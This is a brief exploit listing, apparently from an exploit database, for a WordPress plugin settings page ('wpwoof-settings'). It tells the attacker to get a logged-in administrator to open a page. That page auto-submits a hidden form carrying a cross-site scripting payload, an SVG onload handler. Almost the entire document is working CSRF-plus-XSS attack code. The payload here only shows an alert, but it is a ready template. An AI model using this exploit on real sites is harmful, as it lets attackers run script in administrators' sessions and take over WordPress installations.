Share
## https://sploitus.com/exploit?id=WPEX-ID:46B4582F-7651-4B74-A00B-1788587ECFA8
Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wpwoof-settings" method="POST">
        <input type="hidden" name="page" value='"><svg onload=alert(`XSS`)>' />
        <input type="submit" value="Submit" />
    </form>
  </body>
</html>